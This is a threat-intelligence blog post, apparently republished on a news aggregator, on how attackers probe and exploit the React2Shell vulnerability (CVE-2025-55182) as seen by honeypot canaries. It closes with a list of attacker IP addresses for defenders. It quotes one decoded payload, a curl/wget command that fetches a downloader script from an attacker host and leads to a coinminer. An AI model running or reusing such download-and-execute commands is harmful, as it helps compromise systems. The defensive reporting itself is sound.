Close Menu

    Subscribe to Updates

    Get the latest creative news from FooBar about art, design and business.

    What's Hot

    Is a $30,000 GPU Good at Password Cracking?

    April 8, 2026

    GitLab security advisory (AV26-327) – Canadian Centre for Cyber Security

    April 8, 2026

    Heap-based buffer overflow in cw_acd daemon

    April 8, 2026
    Facebook X (Twitter) Instagram
    • Demos
    • Technology
    • Gaming
    • Buy Now
    Facebook X (Twitter) Instagram Pinterest Vimeo
    Canadian Cyber WatchCanadian Cyber Watch
    • Home
    • News
    • Alerts
    • Tips
    • Tools
    • Industry
    • Incidents
    • Events
    • Education
    Subscribe
    Canadian Cyber WatchCanadian Cyber Watch
    Home»News»React2Shell and What Our Canaries See | Blog
    News

    React2Shell and What Our Canaries See | Blog

    adminBy adminApril 3, 2026No Comments5 Mins Read
    Share Facebook Twitter Pinterest LinkedIn Tumblr Reddit Telegram Email
    Share
    Facebook Twitter LinkedIn Pinterest Email


    Attackers are rapidly adopting React2Shell, but their exploitation techniques remain simple and easily detectable.

    Probing techniques show far more variation than the payloads, which are almost entirely download-and-execute across the IPs hitting our canaries.

    VulnCheck Canary Intelligence shows how attackers are operationalizing React2Shell, and the IPs we’ve collected are listed below for defenders to use.

    The data used in this blog was collected at 5pm EST on December 8, 2025.

    CVE-2025-55182, React2Shell, is an appealing bug for attackers because it offers multiple paths to exploitation. Inside VulnCheck, the Initial Access Intelligence team spends time on the nuances, such as how the in-memory webshell works and how bypasses develop. Real-world attackers often take a different approach, folding the bug into the tooling and workflows they already rely on. To understand how React2Shell is appearing in real attacks, we looked at the probes and payloads hitting our Canary Intelligence. Our research team also has exploit, PoC, and variant analysis here.

    The first React2Shell payload that hit our canary network, on December 5 around 5 am EST, looked relatively benign. It was a straightforward vulnerability check from 95.214.52.170 that issued a ping to 45.157.233.80 to confirm successful exploitation.

    Image 1Image 1

    But upon success, this attacker returned, fetching binaries from 31.56.27.76 or 193.34.213.150. Their follow-up activity consisted of downloading and executing a binary hosted elsewhere.

    Image 2Image 2

    This pattern has been consistent over the last few days: a variety of vulnerability probes followed by the download and execution of weaponized payloads. The probes are worth examining in more detail.

    The vulnerability checks we’ve observed fall into five main flavors. The first is uname-based. A successful check gives the attacker immediate system details on Linux hosts, such as the distribution and architecture. Below is an example probe from 74.201.72.250:

    Image 3Image 3

    The second most common probe is math-based. Honeypots rarely return the correct output, which makes this type of check appealing to attackers. It comes in two forms: a Linux variant and a PowerShell variant, often sent together by the same actor. The following example came over a single TCP connection from 143.110.184.254.

    Image 4Image 4

    It’s also worth noting the hard-coded multipart boundary. ------WebKitFormBoundaryx8jO2oVc6SWP3Sad matches the one used in vulhub’s exploit, which only runs id. It’s another reminder that attackers frequently reuse public proof-of-concept code with minimal changes.

    The third flavor is similar to the previous approach. Forcing the target to perform a calculation helps distinguish a real system from a honeypot, so some attackers use an md5 echo as their probe. Here is an example from 79.124.40.174.

    Image 5Image 5

    I personally think the math-based approaches are the strongest, but another useful variant just executes whoami. It may look less capable, but because whoami runs on both Linux and Windows, it can still give attackers a quick sense of the environment. Here is an example from 95.214.52.170:

    Image 6Image 6

    The last flavor is much less common. Following the approach used in AssetNote’s scanner, some attackers simply trigger the vulnerable codepath to identify a system. Here is an example from 167.86.107.35:

    Image 7Image 7

    These probes make up the bulk of the reconnaissance we’ve observed. From there, attackers move on to weaponized payloads.

    Probing tells us who’s looking. The payloads tell us what they want, which is exactly what Canary Intelligence is built to observe. So far, most of the payload activity has been simple “download and execute” behavior, with only a handful of interesting variations.

    While most payloads follow the same simple pattern, a few attempts are more notable. For example, 85.11.167.3 appears to be using a WAF bypass documented by @pyn3rd on X. The large chunk of random data is intended to evade size restrictions applied by some WAFs.

    Image 8Image 8

    It’s also worth noting that 85.11.167.3 used other, now-defunct methods as part of this activity. Their hosting at gfxnick.emerald.usbx.me is no longer accessible, suggesting that a portion of the campaign has been abandoned.

    Image 9Image 9

    Several campaigns we captured have already gone quiet, but one that remains active is worth highlighting. It uses echo piped through base64 to obfuscate its payload.

    Image 10Image 10

    The payload resolves to (curl \-k http://59.7.217.245:7070/c.sh||wget \--no-check-certificate \-q \-O- http://59.7.217.245:7070/c.sh)\>\>/var/tmp/5.sh which produces a downloader script:

    Image 11Image 11

    All of this effort resolves into a coinminer, which the linked VirusTotal sample confirms.

    Another active campaign in our data is the RondoDox botnet. For those unfamiliar, RondoDox rapidly incorporates new exploits but remains easy to detect because its hard-coded user agents give it away.

    Image 12Image 12

    We’ve seen many more attackers following this same pattern: download a payload to disk and run it. Our Initial Access team has focused on diskless exploitation and the nuances of React2Shell, but most attackers are succeeding with the simplest possible approach.

    Despite the flexibility of React2Shell, most attackers are sticking to familiar workflows: probe, download, execute. The nuance is in the probing, not the payloads. As new campaigns emerge, Canary Intelligence will continue to provide a view into how attackers are adapting the vulnerability to their tooling. A list of the IPs observed in our data is included below.

    IP Addresses
    95.214.52.170
    192.159.99.95
    149.50.96.133
    79.124.40.174
    193.34.213.150
    85.11.167.3
    141.98.82.26
    95.214.52.169
    143.198.145.163
    89.117.50.231
    116.213.36.244
    203.145.44.183
    202.120.234.163
    202.120.234.124
    93.147.15.50
    49.248.192.204
    173.212.239.200
    167.86.107.35
    104.200.73.215
    87.121.84.52
    52.53.242.157
    203.151.66.147
    181.215.193.5
    138.99.203.209
    98.172.84.11
    95.156.229.82
    78.108.180.87
    74.201.72.250
    183.182.125.198
    179.43.134.114
    174.138.2.203
    162.19.222.42
    147.135.11.223
    143.110.184.254
    1.233.104.29
    103.239.14.12

    VulnCheck’s research team tracks real-world exploitation, attacker infrastructure, and exploit workflows using our Canary Intelligence, Exploit & Vulnerability Intelligence (EVI), and IP Intelligence datasets. For more research like this check out our blogs, Frost Checks First, The Mystery OAST Host Behind a Regionally Focused Exploit Operation, and XWiki Under Increased Attack.

    Sign up for the VulnCheck community today to get free access to our VulnCheck KEV, enjoy our comprehensive vulnerability data, and request a trial of our Initial Access Intelligence, IP Intelligence, Canary Intelligence, and Exploit & Vulnerability Intelligence products.



    Source link

    Share. Facebook Twitter Pinterest LinkedIn Tumblr Email
    Previous ArticleSSA-366067 V1.7 (Last Update: 2026-01-13): Multiple Vulnerabilities in Fortigate NGFW Before V7.4.1 on RUGGEDCOM APE1808 Devices
    Next Article Incident: Victoria’s largest childcare org discloses data breach, ID document scans stolen | cyberdaily.au
    admin
    • Website

    Related Posts

    News

    Is a $30,000 GPU Good at Password Cracking?

    April 8, 2026
    News

    InfoSec News Nuggets 04/08/2026

    April 8, 2026
    News

    Microsoft rolls out fix for broken Windows Start Menu search

    April 8, 2026
    Add A Comment

    Comments are closed.

    Demo
    Top Posts

    Global Takedown of Massive IoT Botnets Halts Record-Breaking Cyberattacks

    March 20, 202619 Views

    Catchy & Intriguing

    March 17, 202619 Views

    The Grandparent Scam: How AI Voice Technology Makes This Old Con Deadlier Than Ever

    March 18, 202617 Views
    Stay In Touch
    • Facebook
    • YouTube
    • TikTok
    • WhatsApp
    • Twitter
    • Instagram
    Latest Reviews
    85
    Featured

    Pico 4 Review: Should You Actually Buy One Instead Of Quest 2?

    January 15, 2021 Featured
    8.1
    Uncategorized

    A Review of the Venus Optics Argus 18mm f/0.95 MFT APO Lens

    January 15, 2021 Uncategorized
    8.9
    Editor's Picks

    DJI Avata Review: Immersive FPV Flying For Drone Enthusiasts

    January 15, 2021 Editor's Picks

    Subscribe to Updates

    Get the latest tech news from FooBar about tech, design and biz.

    Demo
    Most Popular

    Global Takedown of Massive IoT Botnets Halts Record-Breaking Cyberattacks

    March 20, 202619 Views

    Catchy & Intriguing

    March 17, 202619 Views

    The Grandparent Scam: How AI Voice Technology Makes This Old Con Deadlier Than Ever

    March 18, 202617 Views
    Our Picks

    Is a $30,000 GPU Good at Password Cracking?

    April 8, 2026

    GitLab security advisory (AV26-327) – Canadian Centre for Cyber Security

    April 8, 2026

    Heap-based buffer overflow in cw_acd daemon

    April 8, 2026

    Subscribe to Updates

    Get the latest creative news from FooBar about art, design and business.

    Facebook X (Twitter) Instagram Pinterest
    • Home
    • Technology
    • Gaming
    • Phones
    • Buy Now
    © 2026 ThemeSphere. Designed by ThemeSphere.

    Type above and press Enter to search. Press Esc to cancel.